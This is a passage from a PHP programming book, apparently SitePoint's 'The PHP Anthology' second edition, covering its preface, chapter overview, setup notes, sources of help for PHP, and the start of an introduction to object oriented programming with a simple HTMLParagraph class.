Appendix B Hosting Provider Checklist
    General Issues
    PHP-related Issues
Appendix C Security Checklist
    Top Security Vulnerabilities
Appendix D Working with PEAR
    Installing PEAR
    The PEAR Package Manager
    Installing Packages Manually
    Alternatives to PEAR
Index
  • 15. Preface
One of the great things about PHP is its vibrant and active community. Developers enjoy many online meeting points, including the SitePoint Forums,[1] where developers get together to help each other out with problems they face on a daily basis, from the basics of how PHP works, to solving design problems like “How do I validate a form?” As a way to get help, these communities are excellent; they’re replete with all sorts of vital fragments you’ll need to make your projects successful.

But putting all that knowledge together into a solution that applies to your particular situation can be a challenge. Often, community members assume other posters have some degree of knowledge; frequently, you might spend a considerable amount of time pulling together snippets from various posts, threads, and users (each of whom has a different programming style) to gain a complete picture.

The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition is, first and foremost, a compilation of the best solutions provided to common PHP questions that turn up at the SitePoint Forums on a regular basis, combined with the experiences and insights our authors have gained from their many years of work with PHP.

What makes this book a little different from others on PHP is that it steps away from a tutorial style, and instead focuses on the achievement of practical goals with a minimum of effort. To that extent, you should be able to use many of the solutions provided here in a plug-and-play manner, without having to read this book from cover to cover. To aid you in your endeavours, each section follows a consistent question-and-solution format. You should be able to scan the table of contents and flip straight to the solution to your problem.

That said, threaded throughout these discussions is a hidden agenda. As well as solutions, this book aims to introduce you to techniques that can save you effort, and help you reduce the time it takes to complete and maintain your web-based PHP applications.

Although it was originally conceived as a procedural programming language, in recent years PHP has proven increasingly successful as a language for the development of object oriented solutions. With the release of PHP 5, PHP gained a completely rewritten and more capable object model. This has been further reinforced by the fact that on July 13, 2007 the PHP development team made the end-of-life announcement for PHP 4.

[1] http://www.sitepoint.com/forums/forumdisplay.php?f=34

  • 16. The object oriented paradigm seems to scare many PHP developers, and is often regarded as being off limits to all but the PHP gurus. What this book will show you is that you don’t need a computer science degree to take advantage of the object oriented features and class libraries available in PHP 5 today. The PHP Extension and Application Repository, known as PEAR,[2] provides a growing collection of reusable and well-maintained solutions for architectural problems (such as web form generation and validation) regularly encountered by PHP developers around the world.

Wherever possible in the development of the solutions provided in this book, we’ve made use of freely available libraries that our authors have personally found handy, and which have saved them many hours of development. The emphasis this book places on taking advantage of reusable components to build your PHP web applications reflects another step away from the focus of many current PHP-related books.

Although you won’t find extensive discussions of object oriented application design, reading The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition from cover to cover will, through a process of osmosis, help you take your PHP coding skills to the next level, setting you well on your way to constructing applications that can stand the test of time.

The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition will equip you with the essentials you need to be confident when working with the PHP engine, including a fast-paced primer on object oriented programming with PHP (see “What is OOP?” in Chapter 1). With that preparation out of the way, the book looks at solutions that could be applied to almost all PHP-based web applications, the essentials of which you may already know, but have yet to fully grasp.

[2] http://pear.php.net/

  • 17. Who Should Read this Book?
If you’ve already gotten your feet wet with PHP, perhaps having read Kevin Yank’s Build Your Own Database Driven Website Using PHP & MySQL, 3rd Edition (SitePoint, Melbourne, ISBN 0-9752402-1-8), and completed your first project or two with PHP, then this is the book for you.

If you’ve been asking questions like “How do I validate a web page form?”, “How do I add a watermark to my photos?”, or “How do I send automated email messages from my web application?”, you’ll find the answers to those questions in this book. If you have the drive to progress your skills or improve your web application through concepts such as reusable components, caching performance, or web services, then you will find this book to be an excellent primer.

What’s Covered in this Book?
Here’s what you’ll find in each of the chapters of this book:

Chapter 1: Introduction
This chapter provides a useful guide to finding help through the PHP manual and other resources. It includes an introduction to object oriented programming: a run-down of PHP’s class syntax, as well as a primer that explains how all the key elements of the object oriented paradigm apply to PHP. It’s essential preparatory reading for later chapters in this anthology. This chapter also provides tips for writing portable code, and gives us the chance to take a look at some of the main PHP configuration pitfalls.

Chapter 2: Using Databases with PDO
This chapter provides you with everything you’ll need to get up to speed with the PHP Data Objects (PDO) extension. We start with the basics, covering important topics such as how to write flexible SQL statements and avoid SQL injection attacks. We then delve into many lesser-known aspects, such as searching, working with transactions and stored procedures, and how to back up your database.

Chapter 3: Strings
This chapter explores the details of handling content on your site. We’ll discuss string functions you can’t live without, along with the process for validating and filtering user-submitted content.
  • 18. Chapter 4: Dates and Times
Here, you’ll learn how to use PHP’s date functions, and implement an online calendar. You’ll also obtain a solid grounding in the storage and manipulation of dates in MySQL.

Chapter 5: Forms, Tables, and Pretty URLs
The essentials of web page forms and tables are covered here. We’ll discuss the development of forms with PEAR::HTML_QuickForm, and you’ll see how to use PEAR::HTML_Table to implement data grids and paged result sets. We’ll also take a look at some tricks you can use with Apache to generate search engine friendly URLs.

Chapter 6: Working with Files
This chapter is a survival guide to working with files in PHP. Here, we’ll cover everything from gaining access to the local file system, to fetching files over a network using PHP’s FTP client. We’ll go on to learn how to create your own zipped archives with PEAR::Archive_Tar, and touch on the use of the Standard PHP Library.

Chapter 7: Email
In this chapter, we deal specifically with email-related solutions, showing you how to take full advantage of email with PHP. We’ll learn to successfully send HTML emails and attachments with help from PEAR::Mail and PEAR::Mail_Mime, and to use PHP to easily handle incoming mails delivered to your web server.

Chapter 8: Images
This chapter explores the creation of thumbnails and explains how to watermark images on your site. We’ll also discuss how you can prevent hotlinking from other sites, create an image gallery complete with Exif data, and produce a few professional charts and graphs (as well as CAPTCHA images) with JpGraph.

Chapter 9: Error Handling
Understand PHP’s error reporting mechanism, how to take advantage of PHP’s custom error handling features, and how to handle errors gracefully, with a focus on exception handling and custom exceptions, in this action-packed chapter.
  • 19. Chapter 10: Access Control
Beginning with basic HTTP authentication, then moving on to application-level authentication, this chapter looks at the ways in which you can control access to your site. Later solutions look at implementing a user registration system, and creating a fine-grained access control system with users, groups, and permissions.

Chapter 11: Caching
This chapter takes the fundamental view that HTML is fastest, and shows you how you can take advantage of caching on both the client and server sides to reduce bandwidth usage and dramatically improve performance. It covers HTTP headers, output buffering, and using PEAR::Cache_Lite.

Chapter 12: XML and Web Services
With XML rapidly becoming a crucial part of almost all web-based applications, this chapter explores the rich XML capabilities of PHP 5. Here, you’ll discover how easy it is to produce and consume web services based on RSS, XML-RPC, SOAP, and REST.

Chapter 13: Best Practices
The goal of this chapter is to examine some of the techniques that have proven themselves in helping development projects succeed. The discussion covers code versioning, how to write distributable code, how to add API documentation to your work, how to reduce bugs with unit testing, and how to deploy code safely.

Running the Code Examples
To run the code examples in this book you will need to ensure you have all the required software, libraries, and extensions. Some of the examples make use of additional packages that will need to be installed separately. Where solutions requiring additional packages are introduced you will find a link to the relevant web page; be sure to read the documentation, including the installation instructions.
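One quick way to confirm that a PHP installation has the extensions the examples rely on is a short script like the sketch below. It is not taken from the book: the helper name missing_extensions() is hypothetical, the names gd, exif, and xmlrpc are assumed to be the internal names of the GD, EXIF, and XML-RPC extensions, and the 5.2.0 minimum version is likewise an assumption.

```php
<?php
// Hypothetical helper (not from the book): returns the names in $required
// that the running PHP build has not loaded.
function missing_extensions(array $required)
{
    $missing = array();
    foreach ($required as $name) {
        if (!extension_loaded($name)) {
            $missing[] = $name;
        }
    }
    return $missing;
}

// Assumed internal names for the GD, EXIF, and XML-RPC extensions.
$required = array('gd', 'exif', 'xmlrpc');

// Assumed minimum version; version_compare() with '>=' returns a boolean.
if (!version_compare(PHP_VERSION, '5.2.0', '>=')) {
    echo 'PHP ', PHP_VERSION, " is older than 5.2.0\n";
}

$missing = missing_extensions($required);
if (count($missing) > 0) {
    echo 'Missing extensions: ', implode(', ', $missing), "\n";
} else {
    echo "All required extensions are loaded\n";
}
```

Running the script from the command line checks the CLI configuration, which may differ from the one your web server uses, so it can be worth requesting the same script through the web server as well.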
  • 20. The following packages are used in the examples in this book:
■ PHP 5.21 (including the GD, EXIF, and XML-RPC extensions)
■ PEAR: http://pear.php.net/ (including Archive_Tar, Cache_Lite, HTML_Table, HTML_QuickForm, Mail, Net_FTP, Structures_DataGrid, and Validate)
■ Zend Framework: http://framework.zend.com/
■ JpGraph: http://www.aditus.nu/jpgraph/

To run all the examples you will also need a web server, database server, email server and FTP server, although instructions for their installation and configuration are out of scope for this book.

If you want to set up a software environment for learning PHP you can’t go past the XAMPP (http://www.apachefriends.org/en/xampp.html) server package for ease of installation and use. It is also available for a variety of operating systems. The Windows version of XAMPP has all of the following components (and more) wrapped up in a single package with a convenient web interface for management:
■ PHP 5 and PEAR
■ Apache HTTP Server: http://httpd.apache.org/
■ MySQL Database Server: http://mysql.org/
■ Mercury Mail Transport System: http://www.pmail.com/
■ Filezilla FTP server: http://filezilla-project.org/

Some examples in the book make specific use of the Apache HTTP Server and MySQL Database Server.

The Book’s Web Site
Located at http://www.sitepoint.com/books/phpant2/, the web site that supports this book will give you access to the following facilities.

The Code Archive
As you progress through this book, you’ll note file names above many of the code listings. These refer to files in the code archive, a downloadable ZIP file that contains all of the finished examples presented in this book. Simply click the Code Archive link on the book’s web site to download it.
  • 21. Updates and Errata
No book is error-free, and attentive readers will no doubt spot at least one or two mistakes in this one. The Corrections and Typos page on the book’s web site[3] will provide the latest information about known typographical and code errors, and will offer necessary updates for new releases of browsers and related standards.

The SitePoint Forums
If you’d like to communicate with other web developers about this book, you should join SitePoint’s online community.[4] The PHP forum,[5] in particular, offers an abundance of information above and beyond the solutions in this book, and a lot of fun and experienced PHP developers hang out there. It’s a good way to learn new tricks, get questions answered in a hurry, and just have a good time.

The SitePoint Newsletters
In addition to books like this one, SitePoint publishes free email newsletters including The SitePoint Tribune, The SitePoint Tech Times, and The SitePoint Design View. Reading them will keep you up to date on the latest news, product releases, trends, tips, and techniques for all aspects of web development. Sign up to one or more SitePoint newsletters at http://www.sitepoint.com/newsletter/.

Your Feedback
If you can’t find an answer through the forums, or if you wish to contact us for any other reason, the best place to write is books@sitepoint.com. We have an email support system set up to track your inquiries, and friendly support staff members who can answer your questions. Suggestions for improvements as well as notices of any mistakes you may find are especially welcome.

Conventions Used in this Book
You’ll notice that we’ve used certain typographic and layout styles throughout this book to signify different types of information. Look out for the following items.

[3] http://www.sitepoint.com/books/phpant2/errata.php
[4] http://www.sitepoint.com/forums/
[5] http://www.sitepoint.com/forums/forumdisplay.php?f=34
  • 22. Code Samples
Code in this book will be displayed using a fixed-width font like so:

    <h1>A perfect summer's day</h1>
    <p>It was a lovely day for a walk in the park. The birds
    were singing and the kids were all back at school.</p>

If the code may be found in the book’s code archive, the name of the file will appear at the top of the program listing, like this:

example.css
    .footer {
      background-color: #CCC;
      border-top: 1px solid #333;
    }

If only part of the file is displayed, this is indicated by the word excerpt:

example.css (excerpt)
      border-top: 1px solid #333;

Some lines of code are intended to be entered on one line, but we’ve had to wrap them because of page constraints. A ➥ indicates a line break that exists for formatting purposes only, and should be ignored.

    URL.open("http://www.sitepoint.com/blogs/2007/05/28/user-style-she
    ➥ets-come-of-age/");
  • 23. xxiii Tips, Notes, and Warnings Hey, You! Tips will give you helpful little pointers. Ahem, Excuse Me … Notes are useful asides that are related—but not critical—to the topic at hand. Think of them as extra tidbits of information. Make Sure you Always … … pay attention to these important points. Watch Out! Warnings will highlight any gotchas that are likely to trip you up along the way.
  • 25. Chapter 1
Introduction
PHP is a programming language that’s designed specifically for building web sites, and is both blessed and cursed with being remarkably easy to learn and use. Getting started is extremely simple. Before long, the typical beginner can put together a simple web site and experiment with the wealth of open source projects available through resources like SourceForge.1

Unfortunately, the ease with which PHP-based sites can be developed also means that you can quickly get yourself into trouble. As traffic to your site increases—along with the demand for more features and greater complexity—it’s important to gain a more intimate understanding of PHP, and to research application designs and techniques that have proved successful on large web sites.

Of course, you can’t leap into programming and expect to know it all straight away. And even if you could, where would be the fun in that?

In this first chapter, I’ll assume you’ve had a basic grounding in PHP, such as that provided in the first few chapters of SitePoint’s introductory PHP title Build Your Own Database Driven Website Using PHP & MySQL,2 and instead concentrate on the essentials of “getting around” in PHP.

1 http://sourceforge.net/
2 http://www.sitepoint.com/books/phpmysql1/

  • 26. In this chapter, you’ll find out where to get help—a defense against those that bark “Read the manual!” at you—and take a quick tour of PHP 5 object oriented syntax and concepts. Not everything here fits under the heading of “basic”—there may also be a few surprises in store for the more experienced PHP developers, so keep your eyes peeled!

Be warned, though, that although the discussion of PHP syntax isn’t the most invigorating of subjects, it is essential to prepare for later chapters. If you start to struggle, remember the lesson from The Karate Kid: you must learn “wax on, wax off” before you can perform the crane kick.

Where do I get help?
PHP is the most widely-used web scripting language, running on over 20 million web sites. For an open source technology that lacks any corporate funding whatsoever, its popularity may seem inexplicable. Yet PHP’s success is no mystery; it has one of the most active and helpful online communities of any technology. Recent estimates place the number of PHP developers worldwide at around 500,000 and, given the nature of the medium, it’s fair to assume that a large proportion are active online. In other words, for developers of PHP-based web sites, help is only ever a few clicks away.

Solution
There are numerous PHP resources available on the Web today, not the least of which is the official PHP Manual.3

RTFM: Read the Fine Manual
There’s a well-known, four-letter acronym, RTFM, which tends to be used to harass beginners in all areas of computing. While I can understand veterans might be unwilling to repeat endlessly the same, well-documented instructions, I think the basic assumption should be that we all know how to read the manual in the first place.

3 http://www.php.net/
  • 27. The documentation for PHP is excellent, and is maintained by volunteers who dedicate themselves to keeping it up to date, understandable, and relevant. The online version is extremely easy to navigate and contains further know-how in the form of annotations from developers across the globe. The manual is one of the areas in which PHP is truly exceptional; software houses like Sun and Microsoft still have a long way to go to provide this quality of material to developers working on their platforms.

The manual is also available in twenty-four different languages, but as you’re reading this book I’ll assume you’re happy with the English version of the manual. It’s broken into five main sections plus appendices. It’s worth knowing what kinds of information can be found where—at least within the first five sections, which are the most relevant to the typical PHP developer.

I. Getting Started and II. Installation and Configuration
■ http://www.php.net/getting-started/
■ http://www.php.net/install/
These sections are where a true beginner starts. Section I has a basic introduction to PHP, explaining what PHP is and what it can do, as well as providing a simple tutorial to show how PHP works. Section II shows how to perform a basic installation of PHP on various operating systems in detail.

III. Language Reference
■ http://www.php.net/langref/
This section covers the fundamentals of PHP as a programming language. Some of these are essential to your ability to achieve anything with PHP, while others become useful as you look for ways to improve your technique. Reading the whole lot in one sitting may well be like reading a dictionary. Fortunately, it’s possible to absorb much of the information contained in the language reference by reading the wealth of tutorials available online, and examining the code that’s used in open source PHP applications.
Certainly, as you read this book, I hope you’ll pick up a thing or two about getting the most out of PHP. However, it’s worth familiarizing yourself with the subjects contained in this section of the manual, and keeping them in the back of your mind for future reference.
  • 28. IV. Security
■ http://www.php.net/security/
This is a very important chapter for beginners and experienced coders alike. Containing information on configuration settings, file system and database security, and general “good practices,” it’s a must for all coders. Most security problems stem from the code, not PHP itself, so being paranoid is a good thing for any coder! The earlier in your PHP coding experience you become familiar with this section of the documentation, the better. After all, it’s easier to learn a good habit than to break a bad one.

V. Features
■ http://www.php.net/features/
Covered in this section are the core elements of PHP that are generally focused on solving specific web-related problems. Much of the Features section reads like an “executive summary” and, from a developer’s point of view, the information contained here may be easier to understand when you see it in action—for instance, in the examples we’ll see throughout this book.

VI. Function Reference
■ http://www.php.net/funcref/
This section makes up the real body of the manual, covering all aspects of the functionality available within PHP. This is where you’ll spend most of your time as you progress with PHP, so you’ll be glad to hear that the PHP group has made a concerted effort to make this section easy to use. It’s even fun, in an idle moment, just to trawl the manual and be amazed by all the things you can do with PHP. Yes, I did just describe reading a manual as “fun!”

The function reference is broken into subsections that cover various categories of functions, each category corresponding to a PHP extension. Apart from the core language syntax, most parts of PHP are grouped into extensions representing discrete functionality.
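If you’d like to see which extensions your own installation provides, a minimal sketch along the following lines may help. It relies on the built-in extension_loaded function; the missingExtensions helper and the particular list of extension names are assumptions made purely for illustration.

```php
<?php
// Hypothetical helper (not from the book's code archive): report which of
// the extensions an application relies on are absent from this PHP build.
function missingExtensions(array $required)
{
    $missing = array();
    foreach ($required as $name) {
        // extension_loaded() returns true when the named extension is available
        if (!extension_loaded($name)) {
            $missing[] = $name;
        }
    }
    return $missing;
}

// 'standard' hosts the string functions and is part of every PHP build;
// 'gd' and 'exif' are optional and depend on how PHP was installed.
$missing = missingExtensions(array('standard', 'gd', 'exif'));

echo $missing
    ? 'Missing extensions: ' . implode(', ', $missing) . "\n"
    : "All required extensions are loaded.\n";
```

Running a check like this at the top of an install script is one way to fail early with a readable message, rather than with an “undefined function” error deep inside the application.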
  • 29. PHP Extensions
The notion of an extension can be a little confusing to start with, as many are distributed with the standard PHP installation. The String functions, which we’d be hard-pressed to live without, are a case in point. In general, the PHP group distributes as part of the default PHP installation all the extensions it regards as being essential to developers.

Extensions that are regarded as nonessential functionality (that is, they’ll be required by some, but not all developers) must be added separately. The important information about each installation appears under the Installation heading on the extension’s main page. Core extensions require no installation, as they’re included with the PHP core; the documentation clearly indicates whenever this is the case with the sentence, “There is no installation needed to use these functions; they are part of the PHP core.” Nonstandard extensions are found in the PECL Repository.4 PECL, the PHP Extension Community Library, is a directory of all known PHP extensions. The process for finding and installing PECL extensions is explained in the Installation and Configuration section of the manual.

Access to information within the Function Reference is available through the Search field (at the manual’s top right) and by searching within the Function List. Note that searching within the Function List examines only the Function Reference section of the manual. To search the entire manual, you need to search within Online Documentation.

Another handy way to move around the manual is to take short cuts directly to functions by submitting the name of the topic you’re interested in via the URL. For example, try entering the following in your browser’s address field: http://www.php.net/strings/. This will take you to http://www.php.net/manual/en/ref.strings.php, which is the main page for the Strings extension.
At the bottom of the page, you’ll see a list of all the functions that the extension makes available. Taking the strpos function as an example, enter the URL http://www.php.net/strpos/ (which takes you to http://www.php.net/manual/en/function.strpos.php). You’ll see the information shown in Figure 1.1.

4 http://pecl.php.net/

  • 30. Figure 1.1. The documentation page for strpos on php.net

The first line contains the name of the function, while the second line lists the PHP versions in which the function is available. The third line tells us what the function actually does. In this case, it’s a fairly terse explanation, but strpos really isn’t a subject that many can get excited about.

Under the Description heading is perhaps the most important line of all—the function’s signature. The signature describes the parameters—the required and optional values this function accepts—and the return value, which is the value we receive after the function has run.

Reading from left to right, we have int, which tells us that the value returned by the function is an integer (in this case, the position of one piece of text within another). Next comes the name of the function itself, and then, in parentheses, the parameters this function takes, separated by commas.

Let’s look at the parameter string $haystack. This says that the first argument—the value supplied to a parameter—should be a string value, while $haystack simply names the argument so that it can be referred to in the detailed description. Note that the third argument is placed inside square brackets, which means it’s optional (that is, you don’t have to supply this argument).

  • 31. Here’s a simple example that shows this function at work:

helloworld.php
    <?php
    $haystack = 'Hello World!';
    $needle = 'orld';
    $position = strpos($haystack, $needle);
    echo 'The substring "' . $needle . '" in "' .
        $haystack . '" begins at character ' . $position;
    ?>

Notice that here, I’ve used strpos similarly to the way it appears in the manual. I used the variable names $haystack and $needle to make clear the way each relates to the explanation in the manual, but you can use whatever variable names you like.

The function signature convention is used consistently throughout the manual, so once you’re used to it, you’ll quickly be able to grasp how to use functions you haven’t tried before.

User Comments
You’ll find user-submitted comments at the bottom of each page in the manual. Usually, at the very least, you’ll see an example that shows how the function is used—information which may solve the particular dilemma you’ve run into. In many cases, you’ll also find alternative explanations and uses for a function, which help to broaden your understanding. Just keep in mind that the user comments are not part of the official documentation, so some of the comments may not be entirely truthful. Usually, any that are factually dubious are later corrected and clarified.

Other Resources
Outside the manual, there are literally thousands of online resources from which you can get further help. I would dare to say that 99% of all the common problems you’ll encounter with PHP have already been faced by someone, somewhere, and their resolutions are available online. This means that the most obvious (but sometimes forgotten) place to begin looking is Google, where a quick search for PHP strpos problem will give you an idea of what I mean.
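One pitfall that such a search is likely to turn up concerns the return value: strpos returns the integer 0 when the match sits at the very start of the string, and false when there’s no match at all, and a loose comparison can’t tell the two apart. The sketch below is my own illustration rather than a listing from the code archive; it reuses the $haystack string from helloworld.php and also exercises the optional third argument, the offset at which the search starts.

```php
<?php
$haystack = 'Hello World!';

// 'Hello' begins at offset 0, which a loose test such as
// if (!$position) would wrongly treat as "not found".
$position = strpos($haystack, 'Hello');

// The strict comparison (===) distinguishes 0 from false.
if ($position === false) {
    echo "Not found\n";
} else {
    echo 'Found at offset ' . $position . "\n";   // prints "Found at offset 0"
}

// Optional third argument: begin searching at offset 5, which skips the
// 'o' in "Hello" and finds the one in "World" instead.
$second = strpos($haystack, 'o', 5);   // 7

// A needle that never occurs yields false rather than an integer.
$absent = strpos($haystack, 'xyz');    // false
```

Comparing against false with === is the habit worth forming here, since it keeps working whether the match is at the start of the string or anywhere else.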
  • 32. There are also some excellent sites where you can get answers directly from other PHP developers (for free, of course—it’s part of the PHP ethic). Perhaps the three biggest English-language resources are:
■ SitePoint Forums, at http://www.sitepointforums.com/
■ Dev Shed Forums, at http://forums.devshed.com/
■ phpBuilder, at http://www.phpbuilder.com/board/

Each of these sites hosts online discussions and, as such, has a very friendly, easy-to-use interface. All have very active memberships and you should find most of your questions answered within 24 hours.

Before you post a question or use one of the other methods listed later to find help, be sure to read How To Ask Questions The Smart Way to help you do the homework for your question.5

Note that when you ask for help on forums, the principle of helping others to help yourself comes to the fore. One of the most common mistakes that beginners make when posting a question is to post a message that says, “This script has a problem,” and paste their entire PHP script below it. Instead, it’s much better to narrow the problem down—identify the area where you’re having problems, and paste in this code snippet, along with other relevant information such as error messages, the purpose of the code, your operating system, and so on. The people who offer help generally don’t want to spend more than a few minutes on your problem (they’re doing it for free, after all), so saving them time will improve your chances of receiving a helpful answer.

Also available to those with an IRC (Internet Relay Chat) client are numerous IRC channels dedicated to PHP development. Two of the more popular channels are #php on efnet.org,6 and ##php on freenode.net.7 These resources can provide immediate assistance for your problem but, like the forums, the channels’ users will expect you to have done your homework beforehand.
Less convenient, but perhaps the most effective last resorts are the PHP mailing lists,8 where beginners are encouraged to use the PHP General User list.9 The lists are available for limited browsing, though it’s possible to search some of them using the Search tool on the PHP web site, and selecting the list of your choice from the search results.

5 http://www.catb.org/~esr/faqs/smart-questions.html
6 http://efnet.org/
7 http://freenode.net/
8 http://www.php.net/mailing-lists.php
9 http://news.php.net/group.php?group=php.general

  • 33. Zend,10 the company developing the core of the PHP engine, also hosts a fairly active forum for general PHP questions.11

Of course, if you want a guaranteed answer, it’s worth investigating paid support options. More information can be found on the Zend Network web site.12

What is OOP?
Just tackling the basics of object oriented programming, or OOP, could easily constitute a whole book—and there are plenty of those out there to prove it! A vast range of information is likely to be covered in any discussion of object oriented programming, so this section will provide a quick overview to help you to understand the basic concepts and to prepare you for the rest of the book. It’s not meant to be a comprehensive primer, but rather is intended to initiate you into the world of OOP.

Solution
The object oriented programming paradigm is an approach to programming that’s intended to encourage the development of well-structured and maintainable applications. Many PHP coders regard object oriented programming as some kind of mystical art, given that examples of PHP frequently use only a procedural approach.13 This is a shame, as there is much to be gained from adopting an object oriented approach to developing PHP applications, perhaps the most important benefit of which is code reuse. A well-written piece of object oriented code can easily be employed to solve the same problem in other projects; we can simply slot it in whenever we need it.
There’s a growing number of object oriented code repositories—such as PEAR14 and PHP Classes15—that can save you hours of slaving over well-charted problems, and leave you free to focus on the specifics of your application.

10 http://www.zend.com/
11 http://www.zend.com/forums/
12 http://www.zend.com/core/network/
13 Procedural programming is the name given to non-object-oriented programming approaches to problem solving that aim to break a programming task into a collection of subroutines.

  • 34. With the release of PHP 5, we’ve gained a greatly enhanced object model that provides improved performance and features that weren’t available in PHP 4.

In practice, learning to use the object model provided by PHP requires us to achieve two goals, which usually have to be undertaken simultaneously:
■ You’ll need to learn the PHP class syntax and object oriented terminology.
■ You must make the mental leap from procedural to object oriented code.

The first step is easy; after all, it’s just a matter of memorization. The second step—the mental leap—is both easy and challenging. Once you take the leap, you’ll no longer think about long lists of tasks that a single script should accomplish; instead, you’ll see programming as putting together a set of tools to which your script will delegate work.

Classes Explained
A class is a generic blueprint of something. “Of what?” you ask. Well, of just about anything: a car, a customer, a product, a button; any object that’s relevant to the application. A class is not actually an object. Instead, it defines the methods (or behaviors) and properties (or attributes, or state) of the object. A class is a plan that’s used to create an object just as the blueprint of a car is used to build a car—it’s simply a plan to achieve the desired product.

The PHP Manual contains a wealth of information on OOP,16 but if you have no knowledge of OOP, the best place to start trying to understand it is with the basic PHP class syntax.17 Let’s take a closer look at classes by creating one ourselves.

Let’s create a very simple class called HTMLParagraph that outputs an HTML paragraph element.
Now, you may be wondering, “What use is a class that does so little?” But please bear with me through this gentle introduction—I promise it’s building to something useful!

14 http://pear.php.net/
15 http://www.phpclasses.org/
16 http://www.php.net/oop5/
17 http://www.php.net/manual/en/language.oop5.basic.php
  • 35. To begin with, we start with the keyword class, followed by the name of the class—in this case, HTMLParagraph. Then we use opening and closing braces to delimit where the class begins and ends:

HTMLParagraph.php (excerpt)
    <?php
    class HTMLParagraph
    {
      ⋮ properties and methods in here
    }
    ?>

We can add properties and methods between these braces. Properties, also known as member variables, are the attributes that will be available to the objects created from this class. They hold the data values that the objects will need in order to function. For example, an object created from the HTMLParagraph class will need a property to store the contents of the paragraph. We declare this property to be private using the private modifier, which we’ll discuss further on. By convention, and for readability, properties are declared at the start of the class:

HTMLParagraph.php (excerpt)
    <?php
    class HTMLParagraph
    {
      private $content;
      ⋮ methods under here
    }
    ?>

Methods describe the actions the objects will enable us to perform. The methods of a class contain the instructions that the objects will need in order to function. Let’s add some methods to our HTMLParagraph class:

HTMLParagraph.php (excerpt)
    <?php
    class HTMLParagraph
    {
      private $content;

      public function __construct($content = '')
      {
        $this->content = $content;
      }

      public function getSource()
      {
        return '<p>' . $this->content . '</p>';
      }
      ⋮ possibly more methods under here
    }
    ?>

  • 36. Here, we’ve added two methods to our class—__construct and getSource. __construct is a special method that initializes our objects for us, while getSource is a method that allows our HTMLParagraph objects to fulfill their purpose: to write a paragraph element in HTML.

Methods can be seen as communication: an object can call a method on another object and receive an answer in return. For example, an object can call the getSource method on an object created from our HTMLParagraph class, and receive the HTML source for the paragraph element in response. The HTMLParagraph object takes care of all the details for us.

As we’ve seen, methods are the actual workers of the class—its behaviors or actions. For example, our HTMLParagraph class has a getSource method to assemble the content into a valid HTML paragraph element. A method’s job is to do one thing and one thing only—and to do it well.

The syntax for a method is straightforward (note that brackets indicate optional syntax):

    public|protected|private [static] function methodName([$param1[, $param2]]){…}
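To make each part of that syntax concrete, here’s a minimal sketch. The CountedParagraph class and its method names are hypothetical, invented for this illustration only; it shows a public method with an optional parameter alongside a static method, which belongs to the class as a whole rather than to any single object.

```php
<?php
// Sketch only: CountedParagraph is a made-up class, not part of the
// book's code archive.
class CountedParagraph
{
    private static $created = 0;   // shared by every object of the class
    private $content;

    public function __construct($content = '')
    {
        $this->content = $content;
        self::$created++;          // count each object as it is created
    }

    // public instance method with one optional parameter
    public function getSource($cssClass = '')
    {
        $attr = $cssClass === '' ? '' : ' class="' . $cssClass . '"';
        return '<p' . $attr . '>' . $this->content . '</p>';
    }

    // public static method: called on the class, not on an object
    public static function getCreatedCount()
    {
        return self::$created;
    }
}

$first  = new CountedParagraph('One');
$second = new CountedParagraph('Two');

echo $first->getSource(), "\n";                  // <p>One</p>
echo $second->getSource('intro'), "\n";          // <p class="intro">Two</p>
echo CountedParagraph::getCreatedCount(), "\n";  // 2
```

Note that the static method is reached with the :: operator and the class name, while the instance methods are reached through an object with ->.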
  • 37. Encapsulation and Visibility
Encapsulation is a basic concept of object oriented programming that dictates that a class should have a public interface and a private implementation. The public interface is the appearance—put simply, the methods and properties—possessed by an object created from the class, which all other objects can see and use. The private implementation refers to the inner workings of the class, which only the objects created from that class need to know about. The separation of the class’s inner workings from its outer appearance is essential for the production of quality object oriented code.

Users of your class should be able to use the class’s public interface, or API (Application Programming Interface), without caring what’s inside, and with confidence that they’ll obtain the desired output. Hiding the inner workings of a class from the user ensures that we can change those internals as required over time—to fix bugs, improve performance, or completely change how the method is implemented—without causing interference or disruption to users. Think of a class as a black box: users just plug their data into the object and receive the results they want.

We indicate the public interface and private implementation of our class by describing the visibility of its properties and methods—in short, describing who can see and access them. PHP 5 has three levels of visibility: public, protected, and private. The public visibility level allows any object or script to see and use the attribute or method.18 Protected visibility means that only those classes which inherit (we’ll discuss the concept of inheritance in the pages to come) from the class, as well as the class itself, can see the attribute or method. The private visibility level describes cases in which only the class itself can see the method or attribute. Note that in our example class the properties are private and the methods are public.
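The three visibility levels can be sketched as follows. The Account and SavingsAccount classes are hypothetical names chosen for this illustration, and the try/catch at the end assumes PHP 7 or later, where an illegal property access throws a catchable Error; under PHP 5 the same access stops the script with a fatal error instead.

```php
<?php
// Hypothetical classes for illustration only. Assumes PHP 7 or later for
// the catchable Error at the end of the listing.
class Account
{
    public    $owner;             // visible to any code
    protected $currency = 'USD';  // visible to Account and its subclasses
    private   $balance  = 0;      // visible to Account only

    public function __construct($owner)
    {
        $this->owner = $owner;
    }

    public function deposit($amount)
    {
        $this->balance += $amount;   // private access from inside the class
        return $this->balance;
    }
}

class SavingsAccount extends Account
{
    public function describe()
    {
        // the protected property is reachable from a child class
        return $this->owner . ' saves in ' . $this->currency;
    }
}

$savings = new SavingsAccount('Ada');
echo $savings->describe(), "\n";          // Ada saves in USD

$newBalance = $savings->deposit(50);      // goes through the public interface
echo $newBalance, "\n";                   // 50

$plain   = new Account('Grace');
$refused = false;
try {
    $plain->balance;                      // private: refused outside the class
} catch (Error $e) {
    $refused = true;
}
echo $refused ? "Direct access to the balance was refused\n" : "Access allowed\n";
```

The balance can only change through deposit, so the class remains free to alter how it stores that value later without breaking the code that uses it.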
When you’re beginning to learn object oriented programming, there’s often some degree of temptation to make everything in your classes public and to avoid thinking about encapsulation at all. However, it’s important for other users of your class to know how your class should be used, and what behavior they can expect—they’ll assume that everything that’s public is safe for them to use. Obviously, if you then change those public properties and methods, you can cause a lot of problems! So, to meet the objective of encapsulation we must reduce the visibility of all our properties and methods to the lowest possible levels.

18 Technically speaking, a method doesn’t need a visibility level. If none is provided, the method is automatically public.

  • 38. Constructors and Destructors
